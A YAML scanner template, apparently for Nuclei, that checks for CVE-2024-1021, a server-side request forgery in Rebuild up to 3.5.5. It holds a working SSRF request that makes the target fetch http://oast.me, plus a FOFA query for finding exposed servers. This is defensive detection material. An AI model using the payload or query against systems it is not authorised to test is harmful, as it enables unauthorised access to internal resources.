35 lines
1.3 KiB
YAML
35 lines
1.3 KiB
YAML
id: CVE-2024-1021
|
|
|
|
info:
|
|
name: Rebuild <= 3.5.5 - Server-Side Request Forgery
|
|
author: BMCel
|
|
severity: medium
|
|
description: |
|
|
There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
|
|
reference:
|
|
- https://github.com/getrebuild/rebuild
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-1021
|
|
impact: |
|
|
Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
|
|
metadata:
|
|
max-request: 2
|
|
verified: true
|
|
fofa-query: "icon_hash=\"871154672\""
|
|
tags: cve2024,cve,rebuild,ssrf
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}"
|
|
- "{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body_2, "<h1> Interactsh Server </h1>")'
|
|
- '!contains(body_1, "<h1> Interactsh Server </h1>")'
|
|
- 'status_code_2 == 200'
|
|
condition: and
|
|
# digest: 4a0a004730450220491492872c6924a820f6183de45c341dbc8838eec5bd79f241a7a8e007817a4d022100bcf486a787a7ac18c43f5a856e8edf8c68546b59012e7c096bbc48085b3ce175:922c64590222798bb761d5b6d8e72950 |